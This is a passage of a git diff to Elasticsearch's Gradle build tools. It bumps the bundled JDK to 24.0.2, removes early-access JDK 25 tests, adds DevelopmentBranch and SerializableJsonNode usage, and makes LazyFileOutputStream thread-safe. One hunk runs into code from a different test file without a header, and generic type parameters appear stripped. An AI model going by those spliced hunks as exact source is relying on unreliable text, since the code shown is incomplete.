b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/OracleOpenJdkToolchainResolverSpec.groovy @@ -9,11 +9,9 @@ package org.elasticsearch.gradle.internal.toolchain -import spock.util.environment.RestoreSystemProperties import org.gradle.api.services.BuildServiceParameters import org.gradle.jvm.toolchain.JavaLanguageVersion -import org.gradle.jvm.toolchain.JavaToolchainDownload import static org.gradle.jvm.toolchain.JvmVendorSpec.ORACLE import static org.gradle.platform.Architecture.AARCH64 @@ -22,7 +20,6 @@ import static org.gradle.platform.OperatingSystem.* class OracleOpenJdkToolchainResolverSpec extends AbstractToolchainResolverSpec { - OracleOpenJdkToolchainResolver resolverImplementation() { var toolChain = new OracleOpenJdkToolchainResolver() { @Override @@ -38,8 +35,7 @@ class OracleOpenJdkToolchainResolverSpec extends AbstractToolchainResolverSpec { "36", "bdc68b4b9cbc4ebcb30745c85038d91d" ), - OracleOpenJdkToolchainResolver.getBundledJdkBuild("24+36@1f9ff9062db4449d8ca828c504ffae90", "24"), - OracleOpenJdkToolchainResolver.getEarlyAccessBuild(JavaLanguageVersion.of(25), "3") + 
OracleOpenJdkToolchainResolver.getBundledJdkBuild("24.0.2+12@fdc5d0102fe0414db21410ad5834341f", "24"), ] toolChain } @@ -56,64 +52,21 @@ class OracleOpenJdkToolchainResolverSpec extends AbstractToolchainResolverSpec { [20, anyVendor(), LINUX, AARCH64, "https://download.oracle.com/java/GA/jdk20/bdc68b4b9cbc4ebcb30745c85038d91d/36/GPL/openjdk-20_linux-aarch64_bin.tar.gz"], [20, anyVendor(), WINDOWS, X86_64, "https://download.oracle.com/java/GA/jdk20/bdc68b4b9cbc4ebcb30745c85038d91d/36/GPL/openjdk-20_windows-x64_bin.zip"], // bundled jdk - [24, ORACLE, MAC_OS, X86_64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_macos-x64_bin.tar.gz"], - [24, ORACLE, MAC_OS, AARCH64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_macos-aarch64_bin.tar.gz"], - [24, ORACLE, LINUX, X86_64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_linux-x64_bin.tar.gz"], - [24, ORACLE, LINUX, AARCH64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_linux-aarch64_bin.tar.gz"], - [24, ORACLE, WINDOWS, X86_64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_windows-x64_bin.zip"], - [24, anyVendor(), MAC_OS, X86_64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_macos-x64_bin.tar.gz"], - [24, anyVendor(), MAC_OS, AARCH64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_macos-aarch64_bin.tar.gz"], - [24, anyVendor(), LINUX, X86_64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_linux-x64_bin.tar.gz"], - [24, anyVendor(), LINUX, AARCH64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_linux-aarch64_bin.tar.gz"], - [24, anyVendor(), WINDOWS, X86_64, "https://download.oracle.com/java/GA/jdk24/1f9ff9062db4449d8ca828c504ffae90/36/GPL/openjdk-24_windows-x64_bin.zip"], - // EA build - [25, ORACLE, MAC_OS, X86_64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_macos-x64_bin.tar.gz"], - [25, ORACLE, MAC_OS, AARCH64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_macos-aarch64_bin.tar.gz"], - [25, ORACLE, LINUX, X86_64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_linux-x64_bin.tar.gz"], - [25, ORACLE, LINUX, AARCH64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_linux-aarch64_bin.tar.gz"], - [25, ORACLE, WINDOWS, X86_64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_windows-x64_bin.zip"], - [25, anyVendor(), MAC_OS, X86_64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_macos-x64_bin.tar.gz"], - [25, anyVendor(), MAC_OS, AARCH64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_macos-aarch64_bin.tar.gz"], - [25, anyVendor(), LINUX, X86_64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_linux-x64_bin.tar.gz"], - [25, anyVendor(), LINUX, AARCH64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_linux-aarch64_bin.tar.gz"], - [25, anyVendor(), WINDOWS, X86_64, "https://download.java.net/java/early_access/jdk25/3/GPL/openjdk-25-ea+3_windows-x64_bin.zip"]] - } - - @RestoreSystemProperties - def "can provide build number for ea versions"() { - given: - System.setProperty('runtime.java.build', "42") - 
System.setProperty('runtime.java.25.build', "13") - def resolver = resolverImplementation() - - when: - Optional download = resolver.resolve( - request( - JavaLanguageVersion.of(version), - vendor, - platform(os, arch) - ) - ) - - then: - download.get().uri == URI.create(expectedUrl) - - where: - version | vendor | os | arch | expectedUrl - 25 | ORACLE | MAC_OS | X86_64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_macos-x64_bin.tar.gz" - 25 | ORACLE | MAC_OS | AARCH64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_macos-aarch64_bin.tar.gz" - 25 | ORACLE | LINUX | X86_64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_linux-x64_bin.tar.gz" - 25 | ORACLE | LINUX | AARCH64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_linux-aarch64_bin.tar.gz" - 25 | ORACLE | WINDOWS | X86_64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_windows-x64_bin.zip" - 25 | anyVendor() | MAC_OS | X86_64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_macos-x64_bin.tar.gz" - 25 | anyVendor() | MAC_OS | AARCH64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_macos-aarch64_bin.tar.gz" - 25 | anyVendor() | LINUX | X86_64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_linux-x64_bin.tar.gz" - 25 | anyVendor() | LINUX | AARCH64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_linux-aarch64_bin.tar.gz" - 25 | anyVendor() | WINDOWS | X86_64 | urlPrefix(25) + "13/GPL/openjdk-25-ea+13_windows-x64_bin.zip" + [24, ORACLE, MAC_OS, X86_64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_macos-x64_bin.tar.gz"], + [24, ORACLE, MAC_OS, AARCH64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_macos-aarch64_bin.tar.gz"], + [24, ORACLE, LINUX, X86_64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_linux-x64_bin.tar.gz"], + [24, ORACLE, LINUX, AARCH64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_linux-aarch64_bin.tar.gz"], + [24, ORACLE, WINDOWS, X86_64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_windows-x64_bin.zip"], + [24, anyVendor(), MAC_OS, X86_64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_macos-x64_bin.tar.gz"], + [24, anyVendor(), MAC_OS, AARCH64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_macos-aarch64_bin.tar.gz"], + [24, anyVendor(), LINUX, X86_64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_linux-x64_bin.tar.gz"], + [24, anyVendor(), LINUX, AARCH64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_linux-aarch64_bin.tar.gz"], + [24, anyVendor(), WINDOWS, X86_64, "https://download.oracle.com/java/GA/jdk24.0.2/fdc5d0102fe0414db21410ad5834341f/12/GPL/openjdk-24.0.2_windows-x64_bin.zip"] + ] } private static String urlPrefix(int i) { - return "https://download.java.net/java/early_access/jdk" + i + "/" + return "https://builds.es-jdk-archive.com/jdks/openjdk/" + i + "/" } def unsupportedRequests() { diff --git a/build-tools-internal/src/test/java/org/elasticsearch/gradle/AbstractDistributionDownloadPluginTests.java b/build-tools-internal/src/test/java/org/elasticsearch/gradle/AbstractDistributionDownloadPluginTests.java index 7512fa20814c6..d2c9bb2c88b5e 100644 --- a/build-tools-internal/src/test/java/org/elasticsearch/gradle/AbstractDistributionDownloadPluginTests.java 
+++ b/build-tools-internal/src/test/java/org/elasticsearch/gradle/AbstractDistributionDownloadPluginTests.java @@ -10,6 +10,7 @@ package org.elasticsearch.gradle; import org.elasticsearch.gradle.internal.BwcVersions; +import org.elasticsearch.gradle.internal.info.DevelopmentBranch; import org.gradle.api.NamedDomainObjectContainer; import org.gradle.api.Project; import org.gradle.testfixtures.ProjectBuilder; @@ -29,7 +30,12 @@ public class AbstractDistributionDownloadPluginTests { protected static final Version BWC_STAGED_VERSION = Version.fromString("1.0.0"); protected static final Version BWC_BUGFIX_VERSION = Version.fromString("1.0.1"); protected static final Version BWC_MAINTENANCE_VERSION = Version.fromString("0.90.1"); - protected static final List DEVELOPMENT_BRANCHES = Arrays.asList("main", "1.1", "1.0", "0.90"); + protected static final List DEVELOPMENT_BRANCHES = Arrays.asList( + new DevelopmentBranch("main", Version.fromString("2.0.0")), + new DevelopmentBranch("1.1", Version.fromString("1.1.0")), + new DevelopmentBranch("1.0", Version.fromString("1.0.1")), + new DevelopmentBranch("0.90", Version.fromString("0.90.1")) + ); protected static final BwcVersions BWC_MINOR = new BwcVersions( BWC_MAJOR_VERSION, diff --git a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/release/ReleaseNotesGeneratorTest.java b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/release/ReleaseNotesGeneratorTest.java index feb1ac1687116..380d4fbf8414d 100644 --- a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/release/ReleaseNotesGeneratorTest.java +++ b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/release/ReleaseNotesGeneratorTest.java @@ -19,6 +19,7 @@ import java.util.Objects; import static org.elasticsearch.gradle.internal.release.GenerateReleaseNotesTask.getSortedBundlesWithUniqueChangelogs; +import static org.hamcrest.Matchers.arrayContaining; import static org.hamcrest.Matchers.equalTo; import static org.junit.Assert.assertFalse; import static org.junit.Assert.assertThat; @@ -100,7 +101,10 @@ public void testTemplate(String templateFilename, String outputFilename, List expectedTransformation = getTests(test_transformed); - NumericNode replacementNode = MAPPER.convertValue(99.99, NumericNode.class); + var replacementNode = SerializableJsonNode.of(99.99, NumericNode.class); List transformedTests = transformTests( tests, diff --git a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/length/ReplaceValueInLengthTests.java b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/length/ReplaceValueInLengthTests.java index 17d7bb1c65f3e..e033c9f2a1640 100644 --- a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/length/ReplaceValueInLengthTests.java +++ b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/length/ReplaceValueInLengthTests.java @@ -15,6 +15,7 @@ import com.fasterxml.jackson.dataformat.yaml.YAMLFactory; import org.elasticsearch.gradle.internal.test.rest.transform.AssertObjectNodes; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.elasticsearch.gradle.internal.test.rest.transform.TransformTests; import org.junit.Test; @@ -34,7 +35,7 @@ public void testReplaceMatch() throws Exception { String test_transformed = "/rest/transform/length/length_replace_transformed_value.yml"; List expectedTransformation = 
getTests(test_transformed); - NumericNode replacementNode = MAPPER.convertValue(99, NumericNode.class); + var replacementNode = SerializableJsonNode.of(99, NumericNode.class); List transformedTests = transformTests( tests, diff --git a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/match/AddMatchTests.java b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/match/AddMatchTests.java index 21dce6f6c95d6..ba684e389a2d6 100644 --- a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/match/AddMatchTests.java +++ b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/match/AddMatchTests.java @@ -15,6 +15,7 @@ import com.fasterxml.jackson.databind.node.ObjectNode; import com.fasterxml.jackson.dataformat.yaml.YAMLFactory; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.elasticsearch.gradle.internal.test.rest.transform.TransformTests; import org.hamcrest.CoreMatchers; import org.junit.Test; @@ -38,7 +39,7 @@ public class AddMatchTests extends TransformTests { public void testAddAllNotSupported() throws Exception { String testName = "/rest/transform/match/match_original.yml"; List tests = getTests(testName); - JsonNode addNode = MAPPER.convertValue("_doc", JsonNode.class); + var addNode = SerializableJsonNode.of("_doc", JsonNode.class); assertEquals( "adding matches is only supported for named tests", assertThrows( @@ -52,7 +53,7 @@ public void testAddAllNotSupported() throws Exception { public void testAddByTest() throws Exception { String testName = "/rest/transform/match/match_original.yml"; List tests = getTests(testName); - JsonNode addNode = MAPPER.convertValue(123456789, JsonNode.class); + var addNode = SerializableJsonNode.of(123456789, JsonNode.class); validateTest(tests, true); List transformedTests = transformTests( tests, diff --git a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/match/ReplaceValueInMatchTests.java b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/match/ReplaceValueInMatchTests.java index f1ed68f1f3d64..c2752e4840917 100644 --- a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/match/ReplaceValueInMatchTests.java +++ b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/match/ReplaceValueInMatchTests.java @@ -15,6 +15,7 @@ import com.fasterxml.jackson.dataformat.yaml.YAMLFactory; import org.elasticsearch.gradle.internal.test.rest.transform.AssertObjectNodes; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.elasticsearch.gradle.internal.test.rest.transform.TransformTests; import org.junit.Test; @@ -33,7 +34,7 @@ public void testReplaceMatch() throws Exception { String test_transformed = "/rest/transform/match/match_transformed.yml"; List expectedTransformation = getTests(test_transformed); - JsonNode replacementNode = MAPPER.convertValue("_replaced_type", JsonNode.class); + SerializableJsonNode replacementNode = SerializableJsonNode.of("_replaced_type", JsonNode.class); List transformedTests = transformTests( tests, List.of( diff --git a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceTextualTests.java 
b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceTextualTests.java index 0fcbd0a94b333..c321c7661bfe6 100644 --- a/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceTextualTests.java +++ b/build-tools-internal/src/test/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceTextualTests.java @@ -9,22 +9,17 @@ package org.elasticsearch.gradle.internal.test.rest.transform.text; -import com.fasterxml.jackson.databind.ObjectMapper; import com.fasterxml.jackson.databind.node.ObjectNode; import com.fasterxml.jackson.databind.node.TextNode; -import com.fasterxml.jackson.dataformat.yaml.YAMLFactory; import org.elasticsearch.gradle.internal.test.rest.transform.AssertObjectNodes; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.elasticsearch.gradle.internal.test.rest.transform.TransformTests; import org.junit.Test; import java.util.List; public class ReplaceTextualTests extends TransformTests { - - private static final YAMLFactory YAML_FACTORY = new YAMLFactory(); - private static final ObjectMapper MAPPER = new ObjectMapper(YAML_FACTORY); - @Test public void testReplaceAll() throws Exception { String test_original = "/rest/transform/text/text_replace_original.yml"; @@ -36,9 +31,9 @@ public void testReplaceAll() throws Exception { List transformedTests = transformTests( tests, List.of( - new ReplaceTextual("key_to_replace", "value_to_replace", MAPPER.convertValue("_replaced_value", TextNode.class), null), - new ReplaceIsTrue("is_true_to_replace", MAPPER.convertValue("is_true_replaced", TextNode.class)), - new ReplaceIsFalse("is_false_to_replace", MAPPER.convertValue("is_false_replaced", TextNode.class)) + new ReplaceTextual("key_to_replace", "value_to_replace", SerializableJsonNode.of("_replaced_value", TextNode.class), null), + new ReplaceIsTrue("is_true_to_replace", SerializableJsonNode.of("is_true_replaced", TextNode.class)), + new ReplaceIsFalse("is_false_to_replace", SerializableJsonNode.of("is_false_replaced", TextNode.class)) ) ); diff --git a/build-tools-internal/version.properties b/build-tools-internal/version.properties index 8694c73ad0990..ee7ec6432ce5d 100644 --- a/build-tools-internal/version.properties +++ b/build-tools-internal/version.properties @@ -1,8 +1,8 @@ -elasticsearch = 9.1.0 +elasticsearch = 9.1.4 lucene = 10.2.2 bundled_jdk_vendor = openjdk -bundled_jdk = 24+36@1f9ff9062db4449d8ca828c504ffae90 +bundled_jdk = 24.0.2+12@fdc5d0102fe0414db21410ad5834341f # optional dependencies spatial4j = 0.7 jts = 1.15.0 @@ -17,12 +17,12 @@ jna = 5.12.1 netty = 4.1.118.Final commons_lang3 = 3.9 google_oauth_client = 1.34.1 -awsv2sdk = 2.30.38 +awsv2sdk = 2.31.78 reactive_streams = 1.0.4 antlr4 = 4.13.1 # bouncy castle version for non-fips. 
fips jars use a different version -bouncycastle=1.78.1 +bouncycastle=1.79 # used by security and idp (need to be in sync due to cross-dependency in testing) opensaml = 4.3.0 diff --git a/build-tools/src/main/java/org/elasticsearch/gradle/Architecture.java b/build-tools/src/main/java/org/elasticsearch/gradle/Architecture.java index c7e6546e66b9a..c2654f9ae851f 100644 --- a/build-tools/src/main/java/org/elasticsearch/gradle/Architecture.java +++ b/build-tools/src/main/java/org/elasticsearch/gradle/Architecture.java @@ -11,15 +11,19 @@ public enum Architecture { - X64("x86_64", "linux/amd64"), - AARCH64("aarch64", "linux/arm64"); + X64("x86_64", "linux/amd64", "amd64", "x64"), + AARCH64("aarch64", "linux/arm64", "arm64", "aarch64"); public final String classifier; public final String dockerPlatform; + public final String dockerClassifier; + public final String javaClassifier; - Architecture(String classifier, String dockerPlatform) { + Architecture(String classifier, String dockerPlatform, String dockerClassifier, String javaClassifier) { this.classifier = classifier; this.dockerPlatform = dockerPlatform; + this.dockerClassifier = dockerClassifier; + this.javaClassifier = javaClassifier; } public static Architecture current() { diff --git a/build-tools/src/main/java/org/elasticsearch/gradle/DistributionDownloadPlugin.java b/build-tools/src/main/java/org/elasticsearch/gradle/DistributionDownloadPlugin.java index 35748459ecac3..838752a515b05 100644 --- a/build-tools/src/main/java/org/elasticsearch/gradle/DistributionDownloadPlugin.java +++ b/build-tools/src/main/java/org/elasticsearch/gradle/DistributionDownloadPlugin.java @@ -191,10 +191,12 @@ private static void addIvyRepo(Project project, String name, String url, String repo.metadataSources(IvyArtifactRepository.MetadataSources::artifact); repo.patternLayout(layout -> layout.artifact("/downloads/elasticsearch/[module]-[revision](-[classifier]).[ext]")); }); - project.getRepositories().exclusiveContent(exclusiveContentRepository -> { - exclusiveContentRepository.filter(config -> config.includeGroup(group)); - exclusiveContentRepository.forRepositories(ivyRepo); - }); + if (project != project.getRootProject()) { + project.getRepositories().exclusiveContent(exclusiveContentRepository -> { + exclusiveContentRepository.filter(config -> config.includeGroup(group)); + exclusiveContentRepository.forRepositories(ivyRepo); + }); + } } private static void setupDownloadServiceRepo(Project project) { diff --git a/build-tools/src/main/java/org/elasticsearch/gradle/LazyFileOutputStream.java b/build-tools/src/main/java/org/elasticsearch/gradle/LazyFileOutputStream.java index c3da389fc30d4..98f442f742e54 100644 --- a/build-tools/src/main/java/org/elasticsearch/gradle/LazyFileOutputStream.java +++ b/build-tools/src/main/java/org/elasticsearch/gradle/LazyFileOutputStream.java @@ -3,8 +3,7 @@ * or more contributor license agreements. Licensed under the "Elastic License * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side * Public License v 1"; you may not use this file except in compliance with, at - * your election, the "Elastic License 2.0", the "GNU Affero General Public - * License v3.0 only", or the "Server Side Public License, v 1". + * your election, the "Elastic License 2.0", the "GNU Affero General Public License v3.0 only", or the "Server Side Public License, v 1". */ package org.elasticsearch.gradle; @@ -18,48 +17,58 @@ * An outputstream to a File that is lazily opened on the first write. 
*/ class LazyFileOutputStream extends OutputStream { - private OutputStream delegate; + private final File file; + private volatile OutputStream delegate; + private volatile boolean initialized = false; + private final Object lock = new Object(); LazyFileOutputStream(File file) { - // use an initial dummy delegate to avoid doing a conditional on every write - this.delegate = new OutputStream() { - private void bootstrap() throws IOException { - file.getParentFile().mkdirs(); - delegate = new FileOutputStream(file); - } - - @Override - public void write(int b) throws IOException { - bootstrap(); - delegate.write(b); - } - - @Override - public void write(byte b[], int off, int len) throws IOException { - bootstrap(); - delegate.write(b, off, len); - } + this.file = file; + } - @Override - public void write(byte b[]) throws IOException { - bootstrap(); - delegate.write(b); + private void ensureInitialized() throws IOException { + if (initialized == false) { + synchronized (lock) { + if (initialized == false) { + file.getParentFile().mkdirs(); + delegate = new FileOutputStream(file); + initialized = true; + } } - }; + } } @Override public void write(int b) throws IOException { + ensureInitialized(); delegate.write(b); } @Override public void write(byte b[], int off, int len) throws IOException { + ensureInitialized(); delegate.write(b, off, len); } + @Override + public void write(byte b[]) throws IOException { + ensureInitialized(); + delegate.write(b); + } @Override public void close() throws IOException { - delegate.close(); + synchronized (lock) { + if (initialized && delegate != null) { + delegate.close(); + } + } + } + + @Override + public void flush() throws IOException { + if (initialized && delegate != null) { + delegate.flush(); + } } } diff --git a/build-tools/src/main/java/org/elasticsearch/gradle/OS.java b/build-tools/src/main/java/org/elasticsearch/gradle/OS.java index d5649f94cf1a4..fda24687ad4e8 100644 --- a/build-tools/src/main/java/org/elasticsearch/gradle/OS.java +++ b/build-tools/src/main/java/org/elasticsearch/gradle/OS.java @@ -15,9 +15,16 @@ import java.util.function.Supplier; public enum OS { - WINDOWS, - MAC, - LINUX; + WINDOWS("windows"), + MAC("darwin"), + LINUX("linux"); + + public final String javaOsReference; + + OS(String javaOsReference) { + // Record the name used to refer to this OS in Java artifact naming. + this.javaOsReference = javaOsReference; + } public static OS current() { String os = System.getProperty("os.name", ""); diff --git a/build-tools/src/main/java/org/elasticsearch/gradle/VersionProperties.java b/build-tools/src/main/java/org/elasticsearch/gradle/VersionProperties.java index 88c7ea3684226..f71b180619002 100644 --- a/build-tools/src/main/java/org/elasticsearch/gradle/VersionProperties.java +++ b/build-tools/src/main/java/org/elasticsearch/gradle/VersionProperties.java @@ -16,7 +16,12 @@ /** * Accessor for shared dependency versions used by elasticsearch, namely the elasticsearch and lucene versions. 
+ * + * @deprecated use ext values set by org.elasticsearch.gradle.internal.conventions.VersionPropertiesPlugin or + * org.elasticsearch.gradle.internal.conventions.VersionPropertiesBuildService + * */ +@Deprecated public class VersionProperties { public static String getElasticsearch() { diff --git a/build-tools/src/main/java/org/elasticsearch/gradle/test/TestBuildInfoPlugin.java b/build-tools/src/main/java/org/elasticsearch/gradle/test/TestBuildInfoPlugin.java index 3cab57a333d2c..c0aabfe17e56f 100644 --- a/build-tools/src/main/java/org/elasticsearch/gradle/test/TestBuildInfoPlugin.java +++ b/build-tools/src/main/java/org/elasticsearch/gradle/test/TestBuildInfoPlugin.java @@ -18,8 +18,11 @@ import org.gradle.api.provider.ProviderFactory; import org.gradle.api.tasks.SourceSet; import org.gradle.api.tasks.SourceSetContainer; +import org.gradle.api.tasks.testing.Test; import org.gradle.language.jvm.tasks.ProcessResources; +import java.util.List; + import javax.inject.Inject; /** @@ -53,5 +56,14 @@ public void apply(Project project) { project.getTasks().withType(ProcessResources.class).named("processResources").configure(task -> { task.into("META-INF", copy -> copy.from(testBuildInfoTask)); }); + + if (project.getRootProject().getName().equals("elasticsearch")) { + project.getTasks() + .withType(Test.class) + .matching(test -> List.of("test", "internalClusterTest").contains(test.getName())) + .configureEach(test -> { + test.systemProperty("es.entitlement.enableForTests", "true"); + }); + } } } diff --git a/build-tools/src/testFixtures/groovy/org/elasticsearch/gradle/fixtures/AbstractGradleFuncTest.groovy b/build-tools/src/testFixtures/groovy/org/elasticsearch/gradle/fixtures/AbstractGradleFuncTest.groovy index d52b7d321c729..447f0b8af496f 100644 --- a/build-tools/src/testFixtures/groovy/org/elasticsearch/gradle/fixtures/AbstractGradleFuncTest.groovy +++ b/build-tools/src/testFixtures/groovy/org/elasticsearch/gradle/fixtures/AbstractGradleFuncTest.groovy @@ -9,25 +9,22 @@ package org.elasticsearch.gradle.fixtures +import spock.lang.Specification +import spock.lang.TempDir + import org.apache.commons.io.FileUtils import org.apache.commons.io.IOUtils import org.elasticsearch.gradle.internal.test.BuildConfigurationAwareGradleRunner import org.elasticsearch.gradle.internal.test.InternalAwareGradleRunner import org.elasticsearch.gradle.internal.test.NormalizeOutputGradleRunner import org.elasticsearch.gradle.internal.test.TestResultExtension -import org.gradle.internal.component.external.model.ComponentVariant import org.gradle.testkit.runner.BuildResult import org.gradle.testkit.runner.GradleRunner import org.junit.Rule import org.junit.rules.TemporaryFolder -import spock.lang.Specification -import spock.lang.TempDir import java.lang.management.ManagementFactory import java.nio.charset.StandardCharsets -import java.nio.file.Files -import java.io.File -import java.nio.file.Path import java.util.jar.JarEntry import java.util.jar.JarOutputStream import java.util.zip.ZipEntry @@ -47,6 +44,7 @@ abstract class AbstractGradleFuncTest extends Specification { File buildFile File propertiesFile File projectDir + File versionPropertiesFile protected boolean configurationCacheCompatible = true protected boolean buildApiRestrictionsDisabled = false @@ -57,6 +55,18 @@ abstract class AbstractGradleFuncTest extends Specification { settingsFile << "rootProject.name = 'hello-world'\n" buildFile = testProjectDir.newFile('build.gradle') propertiesFile = testProjectDir.newFile('gradle.properties') + File 
buildToolsDir = testProjectDir.newFolder("build-tools-internal") + versionPropertiesFile = new File(buildToolsDir, 'version.properties') + versionPropertiesFile.text = """ + elasticsearch = 9.1.0 + lucene = 10.2.2 + + bundled_jdk_vendor = openjdk + bundled_jdk = 24+36@1f9ff9062db4449d8ca828c504ffae90 + minimumJdkVersion = 21 + minimumRuntimeJava = 21 + minimumCompilerJava = 21 + """ propertiesFile << "org.gradle.java.installations.fromEnv=JAVA_HOME,RUNTIME_JAVA_HOME,JAVA15_HOME,JAVA14_HOME,JAVA13_HOME,JAVA12_HOME,JAVA11_HOME,JAVA8_HOME" @@ -83,7 +93,8 @@ abstract class AbstractGradleFuncTest extends Specification { if (subProjectBuild.exists() == false) { settingsFile << "include \"${subProjectPath}\"\n" } - subProjectBuild + subProjectBuild.parentFile.mkdirs() + return subProjectBuild } File subProject(String subProjectPath, Closure configAction) { @@ -161,10 +172,10 @@ abstract class AbstractGradleFuncTest extends Specification { File internalBuild( List extraPlugins = [], String maintenance = "7.16.10", - String bugfix2 = "8.1.3", - String bugfix = "8.2.1", - String staged = "8.3.0", - String minor = "8.4.0", + String major4 = "8.1.3", + String major3 = "8.2.1", + String major2 = "8.3.0", + String major1 = "8.4.0", String current = "9.0.0" ) { buildFile << """plugins { @@ -174,31 +185,31 @@ abstract class AbstractGradleFuncTest extends Specification { import org.elasticsearch.gradle.Architecture import org.elasticsearch.gradle.internal.BwcVersions + import org.elasticsearch.gradle.internal.info.DevelopmentBranch import org.elasticsearch.gradle.Version Version currentVersion = Version.fromString("${current}") def versionList = [ Version.fromString("$maintenance"), - Version.fromString("$bugfix2"), - Version.fromString("$bugfix"), - Version.fromString("$staged"), - Version.fromString("$minor"), + Version.fromString("$major4"), + Version.fromString("$major3"), + Version.fromString("$major2"), + Version.fromString("$major1"), currentVersion ] - BwcVersions versions = new BwcVersions(currentVersion, versionList, ['main', '8.x', '8.3', '8.2', '8.1', '7.16']) - buildParams.setBwcVersions(project.provider { versions} ) + BwcVersions versions = new BwcVersions(currentVersion, versionList, [ + new DevelopmentBranch('main', Version.fromString("$current")), + new DevelopmentBranch('8.x', Version.fromString("$major1")), + new DevelopmentBranch('8.3', Version.fromString("$major2")), + new DevelopmentBranch('8.2', Version.fromString("$major3")), + new DevelopmentBranch('8.1', Version.fromString("$major4")), + new DevelopmentBranch('7.16', Version.fromString("$maintenance")), + ]) + buildParams.setBwcVersions(project.provider { versions } ) """ } - void setupLocalGitRepo() { - execute("git init") - execute('git config user.email "build-tool@elastic.co"') - execute('git config user.name "Build tool"') - execute("git add .") - execute('git commit -m "Initial"') - } - void execute(String command, File workingDir = testProjectDir.root) { def proc = command.execute(Collections.emptyList(), workingDir) proc.waitFor() diff --git a/build.gradle b/build.gradle index 5b534394b4e1c..d26d4d73748e4 100644 --- a/build.gradle +++ b/build.gradle @@ -21,6 +21,8 @@ import org.elasticsearch.gradle.internal.ResolveAllDependencies import org.elasticsearch.gradle.util.GradleUtils import org.gradle.plugins.ide.eclipse.model.AccessRule +import 